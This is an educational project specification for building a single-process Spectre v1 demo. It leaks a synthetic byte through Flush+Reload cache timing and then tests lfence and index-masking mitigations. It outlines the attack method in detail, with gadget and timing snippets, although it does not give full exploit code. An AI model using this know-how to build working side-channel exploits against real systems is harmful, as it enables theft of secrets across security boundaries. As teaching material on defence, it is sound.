Project 3: Speculative Side-Channel Explorer (Spectre-lite)

Build a controlled Spectre-style demo that leaks a secret byte via cache timing, then test mitigations.

Quick Reference

Attribute	Value
Difficulty	Level 4: Expert
Time Estimate	1-2 weeks
Main Programming Language	C (Alternatives: Assembly)
Alternative Programming Languages	Assembly
Coolness Level	Level 5: Pure Magic
Business Potential	3. The “Service & Support” Model
Prerequisites	C, pointers, cache basics, branch prediction basics
Key Topics	speculative execution, misprediction windows, cache timing, mitigation fences

1. Learning Objectives

By completing this project, you will:

Explain how speculation can execute past bounds checks.
Implement a cache timing side-channel using Flush+Reload.
Measure the difference between L1 hits and misses in cycles.
Demonstrate how fences and masking reduce leakage.
Produce a reproducible demo with a clear success and failure case.

2. All Theory Needed (Per-Concept Breakdown)

2.1 Speculative Execution and Misprediction Windows

Fundamentals

Speculative execution is the CPU’s technique for keeping pipelines busy by executing instructions before it is certain they are needed. If the speculation is correct, performance improves. If it is wrong, the CPU discards the speculative results architecturally. However, speculative execution can still leave microarchitectural traces, such as cache state. A misprediction window is the time (in cycles and instructions) between a mispredicted branch and the moment the CPU realizes the mistake and flushes the pipeline. That window is where speculative instructions can execute and create side effects.

Additional fundamentals for Speculative Execution and Misprediction Windows: focus on the simplest mental model and the most common unit of measurement. Identify what changes state, what observes that state, and which constraints are non-negotiable. This keeps the concept grounded before moving to deeper microarchitectural details.

Deep Dive into the concept

Modern out-of-order CPUs execute instructions as soon as their inputs are ready, even if those instructions are on a path that may later be proven incorrect. The front-end predicts branch direction and feeds the pipeline; the backend issues uOps into execution units. The reorder buffer (ROB) tracks speculative instructions and ensures that only correct-path results retire. If the branch prediction is wrong, the ROB squashes the speculative instructions and restores the architectural state. But microarchitectural state, like cache lines brought into L1, is not fully rolled back. This is the core observation behind Spectre-style attacks.

The misprediction window exists because branch resolution is not instantaneous. A branch is resolved when the condition is computed, which often occurs in EX, but the decision can be delayed by data dependencies. The front-end keeps fetching along the predicted path, and the backend keeps executing those instructions. If the branch is mispredicted, all those speculative instructions are squashed. The number of instructions that can be in flight depends on the ROB size, the frontend width, and the branch resolution latency. This window is large enough for a small sequence of dependent operations to execute speculatively, including loads that touch memory based on secret data.

Spectre v1 exploits a bounds check. The pattern is: if (idx < array_len) { value = array[idx]; temp = probe[value * 4096]; } If the predictor is trained to expect the bounds check to pass, it predicts taken even when idx is out of bounds. The speculative execution then reads secret data from out-of-bounds memory and uses it to access a probe array. That access loads a cache line corresponding to the secret value. After the misprediction is resolved, the architectural state is rolled back, but the cache line remains. An attacker then times accesses to the probe array to infer which line is cached, revealing the secret.

The success of this attack depends on careful timing. The secret-dependent access must occur before the misprediction is resolved. That means the speculative path must be short and the data dependency chain must be quick. You can amplify the signal by spacing probe entries by 4096 bytes, ensuring each value maps to a different cache line and page. You also need to flush the probe array before each attempt to reset the cache state, using clflush or equivalent instructions. The attacker then measures reload times with RDTSC. The fast access indicates a cache hit and therefore the secret byte.

Mitigations attack this window. Fences like lfence act as serialization barriers, preventing speculative execution past the fence until prior conditions are resolved. Index masking transforms the bounds check into data dependency, so out-of-bounds indexes are forced into a safe range. Compiler and OS mitigations can insert fences or use safe array indexing primitives. But these mitigations carry performance costs. Your project should demonstrate that adding fences reduces leakage but increases cycles, illustrating the trade-off between security and speed.

Additional deep dive considerations for Speculative Execution and Misprediction Windows: In real designs, Speculative Execution and Misprediction Windows is rarely isolated; it interacts with pipeline depth, power management, compiler decisions, and even microcode updates. When you study this behavior, vary one knob at a time and hold everything else constant: pin the core, fix the frequency if possible, warm up caches and predictors, and record the exact compiler flags. Vendor manuals describe typical behavior, but the actual thresholds can shift across steppings or microcode revisions, so empirical measurement is the ground truth. If your results disagree with published numbers, investigate confounders such as alignment, instruction form, address mapping, or hidden dependencies introduced by the compiler. From a software perspective, compilers and JITs implicitly target Speculative Execution and Misprediction Windows via instruction selection, scheduling, and unrolling, so your measurements should be translated into actionable rules of thumb. Finally, validate with at least two workloads: a synthetic microbenchmark and a slightly more realistic kernel. If both show the same trend, you can trust that the effect is not an artifact of the test harness.

How this fits on projects

You will use this concept in §3.1 and §3.2 to design the vulnerable code path and in §3.7 to interpret the leakage results and the effect of mitigations.

Definitions & key terms

speculation -> executing instructions before their necessity is proven
misprediction window -> time between wrong prediction and pipeline flush
ROB -> reorder buffer that tracks speculative instructions
bounds-check bypass -> speculatively executing past a bounds check

Mental model diagram (ASCII)

Predict taken -> [speculative load secret] -> [touch probe]
Mispredict -> flush architectural state
Cache line remains -> timing reveals secret

How it works (step-by-step, with invariants and failure modes)

Train the branch predictor with in-bounds accesses.
Call the vulnerable function with an out-of-bounds index.
Speculatively read secret and touch probe array.
Flush occurs; architectural effects are discarded.
Time probe array to recover the secret byte.

Invariants:

Architectural state must remain correct after misprediction.
Cache state is not fully rolled back.

Failure modes:

Speculation window too short to touch probe.
Predictor not sufficiently trained.

Minimal concrete example

if (idx < len) {
  uint8_t v = secret[idx];
  sink &= probe[v * 4096];
}

Common misconceptions

“Speculation is the same as prediction” -> speculation is execution; prediction is a guess.
“Flush removes cache effects” -> caches are not architecturally rolled back.

Check-your-understanding questions

Why does a mispredicted branch still affect cache state?
What determines the length of the misprediction window?
Why is the probe array spaced by 4096 bytes?

Check-your-understanding answers

The CPU only rolls back architectural state, not microarchitectural caches.
Branch resolution latency, frontend width, and ROB capacity.
To isolate cache lines and avoid prefetcher or line sharing effects.

Real-world applications

Security research and microarchitecture hardening
Side-channel analysis in cryptography

Where you’ll apply it

In this project: see §3.2 Functional Requirements and §5.10 Phase 2.
Also used in: P02-the-branch-predictor-torture-test.md.

References

“Spectre Attacks: Exploiting Speculative Execution” by Kocher et al.
“Computer Architecture: A Quantitative Approach” Ch. 3

Key insights

Speculation can create measurable microarchitectural traces even when architectural state is correct.

Summary

Speculative execution trades correctness guarantees for performance, and its microarchitectural side effects can leak secrets when timing is measured carefully.

Homework/Exercises to practice the concept

Explain why a data-dependent load is required for a Spectre v1 attack.
Describe how a fence changes the speculative path.

Solutions to the homework/exercises

The secret must influence which cache line is accessed to encode information.
The fence blocks speculative execution past the bounds check.

2.2 Cache Timing and Flush+Reload

Fundamentals

Cache timing attacks distinguish whether a memory address is cached by measuring access latency. A cache hit is fast (a few cycles), while a cache miss is slower (tens to hundreds of cycles). Flush+Reload is a technique where you flush a cache line, allow a victim to potentially load it, and then reload it to see if it is fast. In this project, you are both attacker and victim, so you control the sequence. The key is that timing differences are large enough to be measured reliably with RDTSC when noise is controlled.

Additional fundamentals for Cache Timing and Flush+Reload: focus on the simplest mental model and the most common unit of measurement. Identify what changes state, what observes that state, and which constraints are non-negotiable. This keeps the concept grounded before moving to deeper microarchitectural details.

Deep Dive into the concept

Modern CPUs use multi-level caches. L1 is the fastest and smallest; L2 and L3 are larger and slower. An access that hits L1 can be ~4 cycles, whereas an L3 hit can be 30-50 cycles, and a memory miss can exceed 200 cycles. The attacker leverages this gap. In Flush+Reload, you first evict a cache line using clflush, which forces it out of all cache levels for the core. Then you allow execution to potentially bring it back in (the victim access). Finally, you time a reload of the same address. If the reload is fast, the line is in L1 or L2, indicating the victim accessed it.

Noise comes from hardware prefetchers, TLB effects, and interrupts. To reduce noise, you should use page-aligned buffers and large spacing between probe entries (4096 bytes) so each value maps to a unique cache line and page. This minimizes prefetching across adjacent lines. You should also use mfence or lfence around timing instructions to prevent reordering. When measuring, take many samples and choose a threshold that separates hits from misses. You can compute a histogram of access times and pick a cutoff (e.g., <= 80 cycles for hit). This threshold can be calibrated by measuring known hits and misses first.

Flush+Reload relies on shared memory in real attacks, but in this project you can use a single process. The important educational value is the observation that cache state persists after speculative execution. The reload timing becomes the channel. Your code should record the top candidate values for each attempt, then aggregate across multiple attempts to reduce error. A single run may be noisy, but repeated runs reveal the secret byte with high confidence.

The timing loop must be precise. Use rdtscp to read the timestamp counter with serialization. Use volatile reads to prevent the compiler from optimizing away the access. Keep the probe array in a dedicated buffer and avoid other memory activity between flush and reload. If you see inconsistent results, check core pinning and disable frequency scaling. You should also randomize the order of probing different values to avoid prefetcher patterns.

Mitigation experiments can compare different variants: adding lfence after the bounds check should reduce leakage by preventing speculative execution of the probe load. Alternatively, index masking ensures out-of-bounds indexes map to safe values, which means the probe access will not encode secrets even if speculation occurs. Your timing code will show the difference: with mitigation, the hit rate should drop to near-random noise.

Additional deep dive considerations for Cache Timing and Flush+Reload: In real designs, Cache Timing and Flush+Reload is rarely isolated; it interacts with pipeline depth, power management, compiler decisions, and even microcode updates. When you study this behavior, vary one knob at a time and hold everything else constant: pin the core, fix the frequency if possible, warm up caches and predictors, and record the exact compiler flags. Vendor manuals describe typical behavior, but the actual thresholds can shift across steppings or microcode revisions, so empirical measurement is the ground truth. If your results disagree with published numbers, investigate confounders such as alignment, instruction form, address mapping, or hidden dependencies introduced by the compiler. From a software perspective, compilers and JITs implicitly target Cache Timing and Flush+Reload via instruction selection, scheduling, and unrolling, so your measurements should be translated into actionable rules of thumb. Finally, validate with at least two workloads: a synthetic microbenchmark and a slightly more realistic kernel. If both show the same trend, you can trust that the effect is not an artifact of the test harness.

How this fits on projects

You will use this concept to implement the measurement harness in §3.7 and to define thresholds and histograms in §5.10 Phase 2.

Definitions & key terms

cache hit/miss -> whether a line is in a cache level
clflush -> instruction to evict a cache line
Flush+Reload -> evict, let victim access, then time reload
threshold -> cycle cutoff used to classify hits vs misses

Mental model diagram (ASCII)

Flush line -> Victim access? -> Reload + time
Fast reload => cache hit => secret value

How it works (step-by-step, with invariants and failure modes)

Flush all probe lines.
Trigger speculative access that touches one probe line.
Time reload of each probe entry.
Choose lowest-latency entry as secret guess.

Invariants:

Flush must occur before victim access.
Reload timing must be serialized.

Failure modes:

Prefetcher brings in extra lines and pollutes signal.
Threshold too low or too high misclassifies hits.

Minimal concrete example

clflush(&probe[i * 4096]);
uint64_t t0 = rdtscp();
volatile uint8_t x = probe[i * 4096];
uint64_t dt = rdtscp() - t0;

Common misconceptions

“Cache timing is too noisy” -> with pinning and repetition it is reliable.
“Flush removes all traces” -> cache misses can still be inferred by reload timing.

Check-your-understanding questions

Why do you need a threshold between hits and misses?
Why is 4096-byte spacing common in Spectre demos?
What does clflush guarantee?

Check-your-understanding answers

Timing values overlap; the threshold separates distributions.
It isolates cache lines and pages, reducing prefetch interference.
It evicts the line from the cache hierarchy of the core.

Real-world applications

Side-channel research in cryptography
Cache-based covert channels

Where you’ll apply it

In this project: see §3.7 Real World Outcome and §6.2 Critical Test Cases.
Also used in: P09-l1-bandwidth-stressor-zen-5-focus.md.

References

“Flush+Reload: A High Resolution, Low Noise L3 Cache Side-Channel Attack” by Yarom and Falkner
“Practical Binary Analysis” by Dennis Andriesse

Key insights

Cache timing is a high-bandwidth channel when experiments are controlled.

Summary

Flush+Reload turns cache presence into a measurable signal. When combined with speculation, it can leak data even if architectural state is correct.

Homework/Exercises to practice the concept

Measure and plot a histogram of access times for cached vs flushed lines.
Pick a threshold that minimizes classification error.

Solutions to the homework/exercises

Cached accesses cluster at low cycles, flushed accesses at high cycles.
Choose the valley between the two clusters.

2.3 Cache Timing Measurement and Side-Channel Hygiene

Fundamentals

Speculative side channels only work if you can measure time precisely and control cache state. The core idea is simple: if a line is in cache, it loads quickly; if it is not, it loads slowly. A side-channel attack turns this timing gap into a bit of information. To build a reliable experiment, you need a timer with sub-100 ns resolution, a method to evict or flush cache lines, and a threshold that classifies “hit” vs “miss” with low error. You also need to design your experiment so that the timing signal is not drowned out by noise from the OS, interrupts, or prefetchers. Without careful timing hygiene, you will see random results and mistakenly attribute them to speculation.

Deep Dive into the concept

Timing measurement on modern CPUs is tricky because the pipeline can reorder memory operations and because the timer itself may be speculatively executed. The standard tool on x86 is RDTSC or RDTSCP, often wrapped with LFENCE to serialize. A robust pattern is: LFENCE; RDTSC; load; LFENCE; RDTSCP. This ensures the load completes before you read the end timestamp. On ARM, you use CNTVCT or PMU counters with ISB barriers. The goal is to isolate the load latency from surrounding noise.

Cache control is the other half of the problem. Flush+Reload uses a shared memory line and the CLFLUSH instruction to evict it from cache. After a speculative access, you reload that line and measure the time. If the line is fast, you infer it was touched. Prime+Probe works without shared memory: you fill a cache set with your own lines (prime), let the victim run, and then measure how many lines were evicted (probe). Prime+Probe is more portable but noisier because it depends on cache set mapping and interference. In your Spectre-lite project, Flush+Reload is usually the easiest because it yields a strong signal, but you should still understand Prime+Probe because it models real-world attacks across processes.

The threshold between hit and miss must be calibrated on your actual machine. You can build a histogram of access times for known hot and cold lines and choose a threshold that minimizes misclassification. This threshold is often in the 80-150 cycle range on modern x86, but it varies with frequency and cache hierarchy. Do not hardcode it; measure it. If you skip this step, your “leak” may just be timing noise. Also note that hardware prefetchers can create false hits. To reduce prefetch effects, stride across lines in a pseudo-random pattern or use an access pattern that avoids simple linear strides.

Noise reduction is a serious engineering problem. Pin your process to a core, disable frequency scaling if you can, and keep the machine quiet. If that is not possible, take many samples and use median or majority voting. In Spectre-style experiments, you are often extracting a single bit per trial, so statistical aggregation is your friend. Build your harness so it can run thousands of iterations and produce confidence levels for each leaked bit.

Finally, side-channel hygiene matters even in an educational project. You should implement a “safe mode” that avoids reading any real secrets and uses synthetic data instead. You should also include mitigations (like LFENCE or array index masking) and show that the timing signal disappears when mitigations are enabled. This keeps the project ethical and teaches the core lesson: speculative side channels are about microarchitectural state, not architectural permissions.

How this fits on projects

You will use these techniques in §3.4 Example Output, §5.10 Phase 2 to implement the timing harness, and §7.2 to debug noisy or inconsistent results.

Definitions & key terms

Flush+Reload -> evict a shared line, then time the reload to infer access
Prime+Probe -> fill a cache set, then probe for evictions
threshold -> timing boundary that separates hit vs miss
serialization -> forcing instructions to complete in order for timing accuracy
prefetcher noise -> false hits caused by hardware prefetching

Mental model diagram (ASCII)

[Flush] -> [Speculative Access] -> [Reload + Time]
   hit => fast time => bit = 1
   miss => slow time => bit = 0

How it works (step-by-step, with invariants and failure modes)

Calibrate hit/miss timing thresholds.
Flush or prime the cache state.
Trigger speculative access that depends on secret data.
Reload and time candidate lines.
Classify timings and aggregate over many trials.

Invariants:

Timing measurement must be serialized.
Cache state must be controlled before each trial.

Failure modes:

Prefetchers create false positives.
Timer noise hides the signal.
Threshold is miscalibrated, flipping bits.

Minimal concrete example

// Pseudocode: measure cache hit time
flush(line);
start = rdtsc();
load(line);
end = rdtsc();
cycles = end - start;

Common misconceptions

“Any timer works” -> You need serialization and cycle-level resolution.
“Flush+Reload is always clean” -> Prefetchers and SMT can still add noise.
“One trial proves a leak” -> You need statistical aggregation.

Check-your-understanding questions

Why do you need to calibrate the hit/miss threshold on the target machine?
What is the difference between Flush+Reload and Prime+Probe in terms of requirements?
How do fences (LFENCE/ISB) improve timing accuracy?

Check-your-understanding answers

Because cache latencies vary by CPU, frequency, and system load.
Flush+Reload requires shared memory; Prime+Probe does not but is noisier.
They serialize execution so the timing window surrounds the target load.

Real-world applications

Security research into speculative execution attacks
Constant-time cryptographic implementations
Performance debugging of cache-sensitive code

Where you’ll apply it

In this project: see §3.4 Example Output and §5.10 Phase 2.
Also used in: P02-the-branch-predictor-torture-test.md, P06-memory-disambiguation-probe.md.

References

“Spectre Attacks: Exploiting Speculative Execution” (Kocher et al.)
“A Primer on Cache Attacks” (Gruss et al.)

Key insights

The side channel is the timing signal; everything else is just a way to amplify it.

Summary

Speculative leaks only appear when you can measure cache timing reliably. Calibrate, control cache state, and aggregate results, or your experiment will mislead you.

Homework/Exercises to practice the concept

Build a histogram of cache hit and miss times on your machine and choose a threshold.
Compare Flush+Reload and Prime+Probe on the same buffer and report noise levels.

Solutions to the homework/exercises

The hit cluster should be clearly below the miss cluster; choose a threshold between them.
Prime+Probe will show wider variance and a higher false-positive rate.

3. Project Specification

3.1 What You Will Build

A Spectre-lite demo that leaks a single secret byte using speculative execution and cache timing. The project includes a vulnerable function, a training loop, a probe array, a timing measurement routine, and mitigation toggles (fence or masking). The output shows the recovered secret and the confidence level.

3.2 Functional Requirements

Vulnerable Gadget: A bounds-checked array access that can be mispredicted.
Training Phase: Repeated in-bounds accesses to train the predictor.
Probe Array: 256 entries spaced by 4096 bytes.
Timing Harness: Flush+Reload with threshold-based hit detection.
Mitigations: Optional lfence and index masking toggles.

3.3 Non-Functional Requirements

Performance: Recover a byte within 1 second for 1000 attempts.
Reliability: At least 90 percent correct hits across trials.
Usability: CLI flags for iterations and mitigation mode.

3.4 Example Usage / Output

$ ./spectre_lite --secret "S" --tries 1000 --mitigation none
Recovered: 0x53 'S' (confidence 96%)

3.5 Data Formats / Schemas / Protocols

Output format:

secret_byte,confidence,mitigation
0x53,0.96,none

3.6 Edge Cases

Secret byte that equals 0x00 or 0xFF
Threshold too tight causing misclassification
System noise leading to wrong top candidate

3.7 Real World Outcome

You will see the secret byte recovered when mitigation is off, and near-random guesses when mitigation is on.

3.7.1 How to Run (Copy/Paste)

cc -O2 -Wall -o spectre_lite src/spectre_lite.c
sudo taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation none

3.7.2 Golden Path Demo (Deterministic)

Use --tries 1000 --seed 42 on an otherwise idle core.
Expect recovered byte to match the secret with >90 percent confidence.

3.7.3 If CLI: Exact Terminal Transcript

$ taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation none
Recovered: 0x53 'S' (confidence 96%)

$ echo $?
0

Failure demo (mitigation on):

$ taskset -c 2 ./spectre_lite --secret "S" --tries 1000 --mitigation lfence
Recovered: 0x12 (confidence 18%)

$ echo $?
0

Exit codes:

0 success
2 missing or invalid args
3 timing initialization error

4. Solution Architecture

4.1 High-Level Design

+-----------------+   +------------------+   +------------------+
| Training + Gadget|-> | Probe Access     |-> | Timing + Report  |
+-----------------+   +------------------+   +------------------+

4.2 Key Components

Component	Responsibility	Key Decisions
Gadget	Speculative access path	Keep short dependency chain
Probe Array	Encode secret into cache	4096-byte spacing
Timing	Measure reload times	RDTSCP + threshold

4.3 Data Structures (No Full Code)

uint8_t probe[256 * 4096];
volatile uint8_t sink;

4.4 Algorithm Overview

Key Algorithm: Recover Secret

Flush probe array.
Train predictor with in-bounds indices.
Call gadget with out-of-bounds index.
Time probe entries and pick lowest latency.

Complexity Analysis:

Time: O(tries * 256)
Space: O(256 * 4096)

5. Implementation Guide

5.1 Development Environment Setup

cc --version
# Optional: disable turbo and pin to core for stability

5.2 Project Structure

spectre-lite/
├── src/
│   ├── main.c
│   ├── timing.c
│   └── gadget.c
├── tests/
│   └── test_threshold.c
└── README.md

5.3 The Core Question You’re Answering

“Can speculation leak data even when the program is correct?”

Your demo proves that microarchitectural state can reveal secrets.

5.4 Concepts You Must Understand First

Speculation and pipeline flushes
Cache timing and clflush
Fences and masking mitigations

5.5 Questions to Guide Your Design

How will you ensure the gadget executes speculatively?
How will you choose a timing threshold?
How will you measure confidence in the recovered byte?

5.6 Thinking Exercise

Sketch the pipeline timeline of a mispredicted bounds check. Where does the secret-dependent access occur?

5.7 The Interview Questions They’ll Ask

Why does speculative execution leave cache traces?
What does lfence do and why does it help?
Why is the probe array spaced by 4096 bytes?

5.8 Hints in Layers

Hint 1: Shorten the gadget to keep within the misprediction window.

Hint 2: Calibrate a hit/miss threshold before running the attack.

Hint 3: Use multiple attempts and vote for the top candidate.

5.9 Books That Will Help

Topic	Book	Chapter
Speculation basics	“Computer Architecture”	Ch. 3
Side-channel timing	“Practical Binary Analysis”	timing chapter

5.10 Implementation Phases

Phase 1: Foundation (2-3 days)

Implement timing and cache flush primitives.
Checkpoint: clear hit vs miss timing histogram.

Phase 2: Core Functionality (4-6 days)

Implement gadget and training loop.
Checkpoint: leak a single byte with >80 percent accuracy.

Phase 3: Mitigations (2-3 days)

Add lfence and masking options.
Checkpoint: leakage drops near random.

5.11 Key Implementation Decisions

Decision	Options	Recommendation	Rationale
Timing threshold	fixed vs calibrated	calibrated	portable across CPUs
Mitigation	lfence vs masking	both	show trade-off

6. Testing Strategy

6.1 Test Categories

Category	Purpose	Examples
Unit Tests	Timing correctness	hit vs miss latency
Integration Tests	Full leak	recover secret
Edge Tests	secret 0x00	probe index 0

6.2 Critical Test Cases

Cached line should be below threshold.
Flushed line should be above threshold.
Mitigation should reduce accuracy.

6.3 Test Data

secret='S' (0x53)

7. Common Pitfalls & Debugging

7.1 Frequent Mistakes

Pitfall	Symptom	Solution
Prefetch interference	wrong byte guesses	randomize probe order
Too short training	low accuracy	increase training iterations
Bad threshold	noisy results	calibrate hit/miss

7.2 Debugging Strategies

Print the top 5 candidate bytes with scores.
Use perf to verify branch misses occur.

7.3 Performance Traps

Large probe arrays can evict themselves from cache; keep within L1.

8. Extensions & Challenges

8.1 Beginner Extensions

Leak multiple bytes with repeated runs.

8.2 Intermediate Extensions

Compare lfence vs masking overhead.

8.3 Advanced Extensions

Implement a variant that targets a different gadget or cache level.

9. Real-World Connections

9.1 Industry Applications

Security audits for JITs and sandboxed runtimes
CPU vendor mitigation evaluation

spectre-meltdown-checker: detection scripts and mitigations
pythia: academic cache timing frameworks

9.3 Interview Relevance

Demonstrates understanding of speculation, caches, and side channels.

10. Resources

10.1 Essential Reading

“Spectre Attacks” paper
“Practical Binary Analysis” by Dennis Andriesse

10.2 Video Resources

“Spectre and Meltdown Explained” - security conference talk

10.3 Tools & Documentation

perf: measure branch misses
objdump: inspect emitted assembly

Prereq: P02-the-branch-predictor-torture-test.md
Later: P06-memory-disambiguation-probe.md

11. Self-Assessment Checklist

11.1 Understanding

I can explain speculative execution and why mispredictions flush.
I can describe cache timing and Flush+Reload.
I can explain why mitigations reduce leakage.

11.2 Implementation

The leak works without mitigation.
The leak fails with mitigation enabled.
Results are reproducible on a pinned core.

11.3 Growth

I can discuss side-channel risks in an interview.
I documented all measurement parameters.

12. Submission / Completion Criteria

Minimum Viable Completion:

Leak one byte with >70 percent accuracy.
Provide timing histograms for hit vs miss.

Full Completion:

Implement and compare two mitigations.

Excellence (Going Above & Beyond):

Extend to multi-byte leakage with error-correcting voting.